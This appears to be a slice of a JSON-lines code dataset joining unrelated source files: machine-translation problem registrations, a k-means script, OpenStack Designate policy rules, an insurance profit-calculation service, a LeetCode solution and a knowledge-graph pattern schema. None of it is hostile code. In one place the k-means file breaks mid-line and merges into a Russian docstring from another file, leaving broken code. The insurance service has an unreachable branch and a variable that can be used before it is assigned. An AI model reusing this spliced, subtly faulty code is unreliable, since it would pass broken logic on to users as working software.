problem.SpaceID.EN_TOK\n\n  @property\n  def target_space_id(self):\n    return problem.SpaceID.DE_TOK\n###########\n@registry.register_problem(\"seq_tag_token_8k\")\nclass SeqTagToken8k(WMTProblem):\n\n  @property\n  def targeted_vocab_size(self):\n    return 2**13 # 8192\n\n  @property\n  def train_generator(self):\n    return sequence_token_generator\n\n  @property\n  def input_space_id(self):\n    return problem.SpaceID.EN_TOK\n\n  @property\n  def target_space_id(self):\n    return problem.SpaceID.GENERIC\n\n@registry.register_problem(\"seq_tag_token_32k\")\nclass SeqTagToken32k(WMTProblem):\n\n  @property\n  def targeted_vocab_size(self):\n    return 2**15 # 32768\n\n  @property\n  def train_generator(self):\n    return sequence_token_generator\n\n  @property\n  def input_space_id(self):\n    return problem.SpaceID.EN_TOK\n\n  @property\n  def target_space_id(self):\n    return problem.SpaceID.GENERIC\n\n@registry.register_problem(\"seq_tag_token_128k\")\nclass SeqTagToken128k(WMTProblem):\n\n  @property\n  def targeted_vocab_size(self):\n    return 2**17 # 131072\n\n  @property\n  def train_generator(self):\n    return sequence_token_generator\n\n  @property\n  def input_space_id(self):\n    return problem.SpaceID.EN_TOK\n\n  @property\n  def target_space_id(self):\n    return problem.SpaceID.GENERIC\n\n@registry.register_problem(\"wmt_ende_tokens_32k\")\nclass WMTEnDeTokens32k(WMTEnDeTokens8k):\n\n  @property\n  def targeted_vocab_size(self):\n    return 2**15 # 32768\n\n\ndef ende_character_generator(tmp_dir, train):\n  character_vocab = text_encoder.ByteTextEncoder()\n  datasets = _ENDE_TRAIN_DATASETS if train else _ENDE_TEST_DATASETS\n  tag = \"train\" if train else \"dev\"\n  data_path = _compile_data(tmp_dir, datasets, \"wmt_ende_chr_%s\" % tag)\n  return character_generator(data_path + \".lang1\", data_path + \".lang2\",\n                             character_vocab, EOS)\n\ndef sequence_character_generator(tmp_dir, train):\n  character_vocab = text_encoder.ByteTextEncoder()\n  #datasets = _ENDE_TRAIN_DATASETS if train else _ENDE_TEST_DATASETS\n  #tag = \"train\" if train else \"dev\"\n  #data_path = _compile_data(tmp_dir, datasets, \"wmt_ende_chr_%s\" % tag)\n  if not train:\n    return character_generator('t2t_split_data/input_test.txt', 't2t_split_data/target_test.txt',\n                               character_vocab, EOS)\n  else:\n    return character_generator('t2t_split_data/input_train.txt', 't2t_split_data/target_train.txt',\n                               character_vocab, EOS) \n\n@registry.register_problem(\"seq_tag_char\")\nclass SeqTagChar(WMTProblem):\n\n  @property\n  def 
is_character_level(self):\n return True\n\n @property\n def train_generator(self):\n return sequence_character_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_CHR\n\n @property\n def target_space_id(self):\n return problem.SpaceID.GENERIC\n\n@registry.register_problem(\"wmt_ende_characters\")\nclass WMTEnDeCharacters(WMTProblem):\n \"\"\"Problem spec for WMT En-De translation.\"\"\"\n\n @property\n def is_character_level(self):\n return True\n\n @property\n def train_generator(self):\n return ende_character_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_CHR\n\n @property\n def target_space_id(self):\n return problem.SpaceID.GENERIC\n\n\ndef zhen_wordpiece_token_bigenerator(data_dir, tmp_dir, train,\n source_vocab_size, target_vocab_size):\n \"\"\"Wordpiece generator for the WMT'17 zh-en dataset.\"\"\"\n datasets = _ZHEN_TRAIN_DATASETS if train else _ZHEN_TEST_DATASETS\n source_datasets = [[item[0], [item[1][0]]] for item in _ZHEN_TRAIN_DATASETS]\n target_datasets = [[item[0], [item[1][1]]] for item in _ZHEN_TRAIN_DATASETS]\n source_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.zh.%d\" % source_vocab_size,\n source_vocab_size, source_datasets)\n target_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.en.%d\" % target_vocab_size,\n target_vocab_size, target_datasets)\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"wmt_zhen_tok_%s\" % tag)\n return bi_vocabs_token_generator(data_path + \".lang1\", data_path + \".lang2\",\n source_vocab, target_vocab, EOS)\n\n\ndef zhen_wordpiece_token_generator(data_dir, tmp_dir, train, vocab_size):\n return zhen_wordpiece_token_bigenerator(data_dir, tmp_dir, train,\n vocab_size, vocab_size)\n\n\n@registry.register_problem(\"wmt_zhen_tokens_8k\")\nclass WMTZhEnTokens8k(WMTProblem):\n \"\"\"Problem spec for WMT Zh-En translation.\"\"\"\n\n @property\n def targeted_vocab_size(self):\n return 2**13 # 8192\n\n @property\n def train_generator(self):\n return zhen_wordpiece_token_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.ZH_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.EN_TOK\n\n def feature_encoders(self, data_dir):\n vocab_size = self.targeted_vocab_size\n source_vocab_filename = os.path.join(data_dir,\n \"vocab.zh.%d\" % vocab_size)\n target_vocab_filename = os.path.join(data_dir,\n \"vocab.en.%d\" % vocab_size)\n source_token = text_encoder.SubwordTextEncoder(source_vocab_filename)\n target_token = text_encoder.SubwordTextEncoder(target_vocab_filename)\n return {\n \"inputs\": source_token,\n \"targets\": target_token,\n }\n\n\n@registry.register_problem(\"wmt_zhen_tokens_32k\")\nclass WMTZhEnTokens32k(WMTZhEnTokens8k):\n\n @property\n def targeted_vocab_size(self):\n return 2**15 # 32768\n\n\ndef enfr_wordpiece_token_generator(data_dir, tmp_dir, train, vocab_size):\n \"\"\"Instance of token generator for the WMT en->fr task.\"\"\"\n symbolizer_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.endefr.%d\" % vocab_size, vocab_size)\n datasets = _ENFR_TRAIN_DATASETS if train else _ENFR_TEST_DATASETS\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"wmt_enfr_tok_%s\" % tag)\n return token_generator(data_path + \".lang1\", data_path + \".lang2\",\n symbolizer_vocab, EOS)\n\n\n@registry.register_problem(\"wmt_enfr_tokens_8k\")\nclass WMTEnFrTokens8k(WMTProblem):\n \"\"\"Problem spec 
for WMT En-Fr translation.\"\"\"\n\n @property\n def targeted_vocab_size(self):\n return 2**13 # 8192\n\n @property\n def train_generator(self):\n return enfr_wordpiece_token_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.FR_TOK\n\n\n@registry.register_problem(\"wmt_enfr_tokens_32k\")\nclass WMTEnFrTokens32k(WMTEnFrTokens8k):\n\n @property\n def targeted_vocab_size(self):\n return 2**15 # 32768\n\n\ndef enfr_character_generator(tmp_dir, train):\n \"\"\"Instance of character generator for the WMT en->fr task.\"\"\"\n character_vocab = text_encoder.ByteTextEncoder()\n datasets = _ENFR_TRAIN_DATASETS if train else _ENFR_TEST_DATASETS\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"wmt_enfr_chr_%s\" % tag)\n return character_generator(data_path + \".lang1\", data_path + \".lang2\",\n character_vocab, EOS)\n\n\n@registry.register_problem(\"wmt_enfr_characters\")\nclass WMTEnFrCharacters(WMTProblem):\n \"\"\"Problem spec for WMT En-Fr translation.\"\"\"\n\n @property\n def is_character_level(self):\n return True\n\n @property\n def train_generator(self):\n return enfr_character_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_CHR\n\n @property\n def target_space_id(self):\n return problem.SpaceID.FR_CHR\n\n\ndef mken_wordpiece_token_generator(data_dir, tmp_dir, train, vocab_size):\n \"\"\"Wordpiece generator for the SETimes Mk-En dataset.\"\"\"\n datasets = _MKEN_TRAIN_DATASETS if train else _MKEN_TEST_DATASETS\n source_datasets = [[item[0], [item[1][0]]] for item in _MKEN_TRAIN_DATASETS]\n target_datasets = [[item[0], [item[1][1]]] for item in _MKEN_TRAIN_DATASETS]\n symbolizer_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.mken.%d\" % vocab_size, vocab_size,\n source_datasets + target_datasets)\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"setimes_mken_tok_%s\" % tag)\n return token_generator(data_path + \".lang1\", data_path + \".lang2\",\n symbolizer_vocab, EOS)\n\n\n@registry.register_problem(\"setimes_mken_tokens_32k\")\nclass SETimesMkEnTokens32k(WMTProblem):\n \"\"\"Problem spec for SETimes Mk-En translation.\"\"\"\n\n @property\n def targeted_vocab_size(self):\n return 2**15 # 32768\n\n @property\n def train_generator(self):\n return mken_wordpiece_token_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.MK_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.EN_TOK\n\n\ndef parsing_character_generator(tmp_dir, train):\n character_vocab = text_encoder.ByteTextEncoder()\n filename = \"parsing_%s\" % (\"train\" if train else \"dev\")\n text_filepath = os.path.join(tmp_dir, filename + \".text\")\n tags_filepath = os.path.join(tmp_dir, filename + \".tags\")\n return character_generator(text_filepath, tags_filepath, character_vocab, EOS)\n\n\ndef tabbed_parsing_token_generator(data_dir, tmp_dir, train, prefix,\n source_vocab_size, target_vocab_size):\n \"\"\"Generate source and target data from a single file.\"\"\"\n source_vocab = generator_utils.get_or_generate_tabbed_vocab(\n data_dir, tmp_dir, \"parsing_train.pairs\", 0,\n prefix + \"_source.vocab.%d\" % source_vocab_size, source_vocab_size)\n target_vocab = generator_utils.get_or_generate_tabbed_vocab(\n data_dir, tmp_dir, \"parsing_train.pairs\", 1,\n prefix + \"_target.vocab.%d\" % target_vocab_size, target_vocab_size)\n filename = \"parsing_%s\" 
% (\"train\" if train else \"dev\")\n  pair_filepath = os.path.join(tmp_dir, filename + \".pairs\")\n  return tabbed_generator(pair_filepath, source_vocab, target_vocab, EOS)\n\n\ndef tabbed_parsing_character_generator(tmp_dir, train):\n  \"\"\"Generate source and target data from a single file.\"\"\"\n  character_vocab = text_encoder.ByteTextEncoder()\n  filename = \"parsing_%s\" % (\"train\" if train else \"dev\")\n  pair_filepath = os.path.join(tmp_dir, filename + \".pairs\")\n  return tabbed_generator(pair_filepath, character_vocab, character_vocab, EOS)\n\n\ndef parsing_token_generator(data_dir, tmp_dir, train, vocab_size):\n  symbolizer_vocab = generator_utils.get_or_generate_vocab(\n      data_dir, tmp_dir, \"vocab.endefr.%d\" % vocab_size, vocab_size)\n  filename = \"%s_%s.trees\" % (FLAGS.parsing_path, \"train\" if train else \"dev\")\n  tree_filepath = os.path.join(tmp_dir, filename)\n  return wsj_parsing.token_generator(tree_filepath, symbolizer_vocab,\n                                     symbolizer_vocab, EOS)\n","repo_name":"jackperkins98/t2t_data","sub_path":"take/wmt.py","file_name":"wmt.py","file_ext":"py","file_size_in_byte":27730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21869604466","text":"import pandas as pd\r\nfrom random import randint, seed\r\nfrom math import sqrt\r\nfrom matplotlib import pyplot as plt\r\nimport matplotlib.cm as cm\r\nimport numpy as np\r\n\r\ndef pick_seeds(data,k):\r\n\r\n    centroids = []\r\n    observedIndices = set()\r\n    for i in range(k):\r\n        tempIndex = randint(0, len(data) - 1)\r\n        while(tempIndex in observedIndices):\r\n            tempIndex = randint(0, len(data) - 1)\r\n        centroids.append(data.iloc[tempIndex])\r\n        observedIndices.add(tempIndex)\r\n\r\n    return centroids\r\n\r\ndef recalcCentroids(clusters, data, dataHeaders,k):\r\n\r\n    newCentroids = []\r\n    for i in range(k):\r\n        averages = dict(zip(dataHeaders,[0]*len(dataHeaders)))\r\n        for item in clusters[i]:\r\n            for h in dataHeaders:\r\n                averages[h]+=data.loc[item,h]\r\n        for h in dataHeaders:\r\n            averages[h]=float(averages[h])/(len(clusters[i]))\r\n            #if empty cluster, this could create div by 0 error\r\n        newCentroids.append(averages)\r\n\r\n    return newCentroids\r\n\r\ndef pickClosest(dp, centroids, dataHeaders):\r\n\r\n    minDist = None\r\n    index = 0\r\n    count = 0\r\n    for c in centroids:\r\n        tempDist = 0\r\n        for h in dataHeaders:\r\n            tempDist+=(c[h]-dp[h])**2\r\n        tempDist = sqrt(tempDist)\r\n        if minDist == None or tempDist20->30-> пока не вернет пустой список\"\"\"\n        step = 0\n        shows_list = []\n        request_result = self.load_part_list(step)\n        while request_result:\n            for result in request_result:\n                shows_list.append(result)\n            step += self.part_step\n            sleep(1)\n            request_result = self.load_part_list(step)\n        return shows_list\n","repo_name":"AlexeyRadchenko/LostFilmBot","sub_path":"parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"73511641433","text":"# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom oslo_log import versionutils\nfrom oslo_policy import policy\n\nfrom designate.common import constants\nfrom designate.common.policies import base\n\n\ndeprecated_all_tenants = policy.DeprecatedRule(\n name=\"all_tenants\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\ndeprecated_edit_managed_records = policy.DeprecatedRule(\n name=\"edit_managed_records\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\ndeprecated_use_low_ttl = policy.DeprecatedRule(\n name=\"use_low_ttl\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\ndeprecated_use_sudo = policy.DeprecatedRule(\n name=\"use_sudo\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\ndeprecated_hard_delete = policy.DeprecatedRule(\n name=\"hard_delete\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\n\nrules = [\n policy.RuleDefault(\n name=\"all_tenants\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description='Action on all tenants.',\n deprecated_rule=deprecated_all_tenants),\n policy.RuleDefault(\n name=\"edit_managed_records\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description='Edit managed records.',\n deprecated_rule=deprecated_edit_managed_records),\n policy.RuleDefault(\n name=\"use_low_ttl\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description='Use low TTL.',\n deprecated_rule=deprecated_use_low_ttl),\n policy.RuleDefault(\n name=\"use_sudo\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description='Accept sudo from user to tenant.',\n deprecated_rule=deprecated_use_sudo),\n policy.RuleDefault(\n name=\"hard_delete\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description=\"Clean backend resources associated with zone\",\n deprecated_rule=deprecated_hard_delete),\n]\n\n\ndef list_rules():\n return rules\n","repo_name":"openstack/designate","sub_path":"designate/common/policies/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"5"} +{"seq_id":"23063878196","text":"from datetime import datetime, timedelta\nimport datetime as dt\n\nfrom sql import insurance_profit_calculation_sql\n\n\"\"\"\n 短期债券报表Service\n\"\"\"\n\n\nclass InsuranceProfitCalculationService:\n\n def __init__(self):\n self.sql = insurance_profit_calculation_sql\n\n \"\"\"\n 保险收益测算表查询\n \"\"\"\n\n def profit_calculation_report_list(self, query_data):\n\n queryDate = query_data.get(\"settleDate\")\n if(queryDate == None):\n queryDate = dt.date.today().strftime('%Y-%m-%d')\n fundsDataReturn = self.sql.get_funds_list(queryDate, self.__quarter_end(queryDate))\n investDataReturn = self.sql.get_security_invest_list(queryDate, self.__quarter_end(queryDate))\n\n lineRecordMap = {}\n self.__init_lineRecordMap(lineRecordMap)\n\n self.__calculation_by_dbData(fundsDataReturn, lineRecordMap)\n self.__calculation_by_dbData(investDataReturn, lineRecordMap)\n\n hjLineRecord = lineRecordMap[\"hj\"]\n wttzzhjLineRecord = 
lineRecordMap[\"wttzzh\"]\n        for key in lineRecordMap.keys():\n            lineRecord = lineRecordMap[key]\n            if(key == \"wttzzh\"):\n                wttzzhjLineRecord[\"inveCost\"] = lineRecord[\"inveCost\"]\n                wttzzhjLineRecord[\"wAvgOccupy\"] = lineRecord[\"wAvgOccupy\"]\n                wttzzhjLineRecord[\"profit\"] = lineRecord[\"profit\"]\n            if(key != \"hj\" and key != \"wttzzh\" and key != \"yjzzs\" and key != \"hjzy\" and key != \"hjshzy\"):\n                hjLineRecord[\"inveCost\"] = hjLineRecord[\"inveCost\"] + lineRecord[\"inveCost\"]\n                hjLineRecord[\"wAvgOccupy\"] = hjLineRecord[\"wAvgOccupy\"] + lineRecord[\"wAvgOccupy\"]\n\n        lineRecordMap[\"hj\"] = hjLineRecord\n        lineRecordMap[\"wttzzh\"] = wttzzhjLineRecord\n        lineRecordMap[\"hjzy\"][\"inveCost\"] = hjLineRecord[\"inveCost\"] + wttzzhjLineRecord[\"inveCost\"]\n        lineRecordMap[\"hjzy\"][\"wAvgOccupy\"] = hjLineRecord[\"wAvgOccupy\"] + wttzzhjLineRecord[\"wAvgOccupy\"]\n        lineRecordMap[\"hjzy\"][\"profit\"] = hjLineRecord[\"profit\"] + wttzzhjLineRecord[\"profit\"]\n        lineRecordMap[\"hjshzy\"][\"inveCost\"] = lineRecordMap[\"hjzy\"][\"inveCost\"]\n        lineRecordMap[\"hjshzy\"][\"wAvgOccupy\"] = lineRecordMap[\"hjzy\"][\"wAvgOccupy\"]\n        lineRecordMap[\"hjshzy\"][\"profit\"] = lineRecordMap[\"hjzy\"][\"profit\"]\n\n        for key in lineRecordMap.keys():\n            lineRecord = lineRecordMap[key]\n            if(lineRecord[\"wAvgOccupy\"] != 0):\n                lineRecord[\"yield\"] = lineRecord[\"profit\"]/lineRecord[\"wAvgOccupy\"]*100\n            if(lineRecordMap[\"hjzy\"][\"inveCost\"] != 0):\n                lineRecord[\"proportion\"] = lineRecord[\"inveCost\"] / lineRecordMap[\"hjzy\"][\"inveCost\"] *100\n            lineRecordMap[key] = lineRecord\n            print(lineRecord)\n\n        returnData = {}\n        returnDataList = []\n        for key in lineRecordMap.keys():\n            returnDataList.append(lineRecordMap[key])\n\n        returnData['list'] = returnDataList\n        returnData['total'] = returnDataList.__len__()\n        return returnData\n\n    \"\"\"\n    转换名称\n    \"\"\"\n\n\n    def __init_lineRecordMap(self, lineRecordMap):\n        lineRecordMap['gdsyl'] = {'name': \"1 固定收益类\"}\n        # 保证金存款\n        lineRecordMap['1.1bzjck'] = {'name': \" 1.1 保证金存款\"}\n        bzjck = {'name': \"保证金存款\"}\n        lineRecordMap['bzjck'] = bzjck\n        # 协议/定期存款\n        lineRecordMap['1.2dqck'] = {'name': \" 1.2 协议/定期存款\"}\n        dqck = {'name': \"协议/定期存款\"}\n        lineRecordMap['dqck'] = dqck\n        # 通知存款\n        lineRecordMap['1.3tzck'] = {'name': \" 1.3 通知存款\"}\n        tzck = {'name': \"通知存款\"}\n        lineRecordMap['tzck'] = tzck\n        # 保险资管产品\n        lineRecordMap['1.4bxzgcp'] = {'name': \" 1.4 保险资管产品\"}\n        bxzgcp = {'name': \"保险资管产品\"}\n        lineRecordMap['bxzgcp'] = bxzgcp\n        # 债券\n        lineRecordMap['1.5zq'] = {'name': \" 1.5 债券(委托)\"}\n        zq = {'name': \"债券\"}\n        lineRecordMap['zq'] = zq\n        #2. 现金及流动性管理工具\n        lineRecordMap['2.0zq'] = {'name': \"2 现金及流动性管理工具\"}\n        # 现金(自有及委托)\n        lineRecordMap['2.1xj'] = {'name': \" 2. 1 现金\"}\n        xj = {'name': \"现金(自有及委托)\"}\n        lineRecordMap['xj'] = xj\n        # 货币基金\n        lineRecordMap['2.2hbjj'] = {'name': \" 2. 2 货币市场基金\"}\n        hbjj = {'name': \"货币基金(自有)\"}\n        lineRecordMap['hbjj'] = hbjj\n        # 货币市场类资管产品\n        lineRecordMap['2.3hbsczgcp'] = {'name': \" 2. 3 货币市场类资管产品\"}\n        hbsczgcp = {'name': \"货币市场类资管产品\"}\n        lineRecordMap['hbsczgcp'] = hbsczgcp\n        # 交易所逆回购\n        lineRecordMap['2.4hg'] = {'name': \" 2. 
4回购\"}\n jysnhg = {'name': \"交易所逆回购\"}\n lineRecordMap['jysnhg'] = jysnhg\n # 正回购(委托)\n zhg = {'name': \"正回购(委托)\"}\n lineRecordMap['zhg'] = zhg\n #权益类\n lineRecordMap['3.0qyl'] = {'name': \"3 权益类\"}\n # 权益类 基金\n qyljj = {'name': \"基金\"}\n lineRecordMap['qyljj'] = qyljj\n # 权益类 资管产品\n qylzgcp = {'name': \"资管产品\"}\n lineRecordMap['qylzgcp'] = qylzgcp\n # 权益类 股票与基金(委托)\n gpjj = {'name': \"股票与基金(委托)\"}\n lineRecordMap['gpjj'] = gpjj\n # 其它金融产品\n lineRecordMap['4.0qtjrcp'] = {'name': \"4 其它金融产品\"}\n qtjrcp = {'name': \"其它金融产品\"}\n lineRecordMap['qtjrcp'] = qtjrcp\n # 不动产类资产\n lineRecordMap['5.0bdc'] = {'name': \"5 不动产类资产\"}\n bdc = {'name': \"不动产类资产\"}\n lineRecordMap['bdc'] = bdc\n lineRecordMap['hj'] = {'name': \"合计\"}\n lineRecordMap['wttzzh'] = {'name': \"委托投资组合融资\"}\n lineRecordMap['yjzzs'] = {'name': \"预计增值税\"}\n lineRecordMap['hjzy'] = {'name': \"合计(自有)\"}\n lineRecordMap['hjshzy'] = {'name': \"合计(税后自有)\"}\n self.__init_lineRecordColumns(lineRecordMap)\n\n def __init_lineRecordColumns(self, lineRecordMap):\n columns = ['inveCost', 'wAvgOccupy', 'proportion', 'yield', 'profit']\n for key in lineRecordMap.keys():\n for column in columns:\n lineRecordMap.get(key)[column] = 0\n\n def __calculation_by_dbData(self, dbData, lineRecordMap):\n for item in dbData:\n typeStr = ''\n secuCategoryCode = item['secucategorycode']\n bizTypeCode = item[\"biztypecode\"]\n if secuCategoryCode == None:\n secuCategoryCode = ''\n else:\n if(secuCategoryCode == \"BZJCK\"): # 保证金存款\n typeStr = 'bzjck'\n elif (secuCategoryCode == \"DDT\"): # 协议/定期存款\n typeStr = 'dqck'\n elif (secuCategoryCode == \"DDN\"): # 通知存款\n typeStr = 'tzck'\n elif (secuCategoryCode == \"BXZGCP\"): # 保险资管产品\n typeStr = 'bxzgcp'\n elif (secuCategoryCode.startswith(\"DB\")): # 债券(委托)\n typeStr = 'zq'\n elif (secuCategoryCode == \"DDC\"): # 现金\n typeStr = 'xj'\n elif (secuCategoryCode == \"EUM\"): # 货币市场基金\n typeStr = 'hbjj'\n elif (secuCategoryCode == \"BXZGCP\"): # 货币市场类资管产品\n typeStr = 'hbsczgcp'\n elif (secuCategoryCode == \"DP\"): # 回购\n if(bizTypeCode == \"funds_repurchase_nhg\"): # 交易所逆回购\n typeStr = 'jysnhg'\n elif(bizTypeCode == \"funds_repurchase_zhg\"): # 正回购(委托)\n typeStr = 'zhg'\n elif (secuCategoryCode.startswith(\"EU\")):\n if (secuCategoryCode != \"EUM\"): # 权益类 基金\n typeStr = 'qyljj'\n elif (secuCategoryCode == \"ZGCP\"): # 权益类 资管产品\n typeStr = 'qylzgcp'\n elif (secuCategoryCode == \"GPYJJWT\"): # 权益类 股票与基金(委托)\n typeStr = 'gpjj'\n elif (secuCategoryCode == \"EWE\"): # 其它金融产品\n typeStr = 'qtjrcp'\n elif (secuCategoryCode == \"BDC\"): # 不动产\n typeStr = 'bdc'\n if typeStr != '':\n self.__use_data(typeStr, item, lineRecordMap)\n\n def __use_data(self, typeStr, data, lineRecordMap):\n lineRecord = lineRecordMap[typeStr]\n lineRecord['inveCost'] = lineRecord['inveCost'] + data['invecost']\n lineRecord['profit'] = lineRecord['profit'] + data['inverealprofit']\n positionQty = data['positionqty']\n settleDate = data['settledate']\n positionCreateDate = data['positioncreatedate']\n positionClearDate = data['positioncleardate']\n lastYearEed = self.__quarter_end(settleDate)\n if(positionQty>0):\n if(positionCreateDate<=lastYearEed):\n inveCost = data['invecost'] * self._cal_day_between(lastYearEed, settleDate)/365\n else:\n inveCost = data['invecost'] * self._cal_day_between(positionCreateDate, settleDate)/365\n elif(positionQty==0):\n if(positionClearDate>lastYearEed):\n costPositionData = self.sql.get_cost_position_data(data[\"secuglobalcode\"], positionClearDate)\n inveCost = costPositionData['invecost'] * 
self._cal_day_between(lastYearEed, positionClearDate)/365\n print(data['invecost'])\n lineRecord['wAvgOccupy'] = lineRecord['wAvgOccupy'] + inveCost\n\n\n \"\"\"\n 根据传入的时间获取上年年末日期\n \"\"\"\n\n def __quarter_end(self, currentDate):\n YYYYmmdd = '%Y-%m-%d'\n day = dt.datetime.strptime(currentDate, \"%Y-%m-%d\")\n # 本年第一天\n this_year_start = dt.datetime(day.year, 1, 1)\n # 上年最后一天\n last_year_end_time = this_year_start - timedelta(days=1) + dt.timedelta(hours=23, minutes=59, seconds=59)\n last_year_end = last_year_end_time.strftime(YYYYmmdd)\n # 存放顺序:当前季度末,上个季度末,去年年末\n return last_year_end\n\n \"\"\"\n 计算两日期之间的天数\n \"\"\"\n\n def _cal_day_between(self, startDate, endDate):\n start_date = dt.datetime.strptime(startDate, \"%Y-%m-%d\")\n end_date = dt.datetime.strptime(endDate, \"%Y-%m-%d\")\n return (end_date - start_date).days\n\n\n","repo_name":"hj12hj/ifohoo-flask","sub_path":"service/insurance_profit_calculation_service.py","file_name":"insurance_profit_calculation_service.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15907125128","text":"\"\"\"\n * 你需要从空字符串开始 构造 一个长度为 n 的字符串 s ,构造的过程为每次给当前字符串 前面 添加 一个 字符。\n * 构造过程中得到的所有字符串编号为 1 到 n ,其中长度为 i 的字符串编号为 si 。\n * 比方说,s = \"abaca\" ,s1 == \"a\" ,s2 == \"ca\" ,s3 == \"aca\" 依次类推。\n * si 的 得分 为 si 和 sn 的 最长公共前缀 的长度(注意 s == sn )。\n * 给你最终的字符串 s ,请你返回每一个 si 的 得分之和 。\n * 提示:\n * 1、1 <= s.length <= 10^5\n * 2、s 只包含小写英文字母。\n * 链接:https://leetcode.cn/problems/sum-of-scores-of-built-strings/\n\"\"\"\n\n#\n# @lc app=leetcode.cn id=2223 lang=python3\n#\n# [2223] 构造字符串的总得分和\n#\n\n\n# @lc code=start\nclass Solution:\n\n def sumScores(self, s: str) -> int:\n n = len(s)\n z = [0] * n # 扩展kmp\n ans, l, r = n, 0, 0\n for i in range(1, n):\n # 注:不用 min max,拆开用 < > 比较会更快(仅限于 Python)\n z[i] = max(min(z[i - l], r - i + 1), 0) \n while i + z[i] < n and s[z[i]] == s[i + z[i]]:\n l, r = i, i + z[i]\n z[i] += 1\n ans += z[i]\n return ans\n\n\n# @lc code=end\n\nif __name__ == '__main__':\n # 9\n print(Solution().sumScores(\"babab\"))\n # 14\n print(Solution().sumScores(\"azbazbzaz\"))","repo_name":"adanzl/leetcode-practice","sub_path":"py/q2200/Q2223.py","file_name":"Q2223.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12365678351","text":"import itertools\nimport logging\nimport typing\n\nfrom semantics.graph_layer import elements\nfrom semantics.kb_layer import schema, evidence, orm\nfrom semantics.kb_layer import schema_registry\n\nfrom semantics.kb_layer.orm._word_schema import Word\n\nif typing.TYPE_CHECKING:\n from semantics.kb_layer import schema_attributes\n\n\n_logger = logging.getLogger(__name__)\n\n\nPATTERN_RELATED_LABEL_NAMES = frozenset([\n 'TEMPLATE',\n 'MATCH_REPRESENTATIVE',\n 'CHILD',\n 'SELECTOR',\n 'PREIMAGE',\n 'IMAGE',\n])\n\n\nMatchSchema = typing.TypeVar('MatchSchema', bound=schema.Schema)\nMatchMapping = typing.Dict['Pattern', typing.Tuple['schema.Schema', float]]\n\n\n@schema_registry.register\nclass Pattern(schema.Schema, typing.Generic[MatchSchema]):\n \"\"\"A pattern is a description of the structure of a subgraph of the knowledge graph. Patterns\n correspond to phrases or sentences in natural language. The components of the pattern are\n arranged into a tree or hierarchy which determines the order of search. 
Matches are built up\n from the leaves to the root of the tree, with each branch representing a sub-clause or\n sub-phrase of the larger pattern.\"\"\"\n\n def __repr__(self) -> str:\n name = ''\n name_obj = self.name.get(validate=False)\n if name_obj and name_obj.spelling:\n name = name_obj.spelling\n return '<%s#%s(%s)>' % (type(self).__name__, int(self._vertex.index), name)\n\n match_representative = schema.attribute('MATCH_REPRESENTATIVE')\n\n # Some, but not all, patterns are named. Typically named patterns are reusable mixins that\n # are only used in a selector role.\n name = schema.attribute('NAME', Word)\n names = schema.attribute('NAME', Word, plural=True)\n\n # Selectors are other patterns which match against the *same* vertex in the graph as this\n # pattern does. Think of a selector as roughly equivalent to a mixin class, but for patterns.\n selectors: 'schema_attributes.PluralAttribute[Pattern[MatchSchema]]'\n\n # Children are other patterns which match against arbitrary other vertices in the graph.\n children: 'schema_attributes.PluralAttribute[Pattern]'\n\n # The template pattern, if defined, is another pattern which was 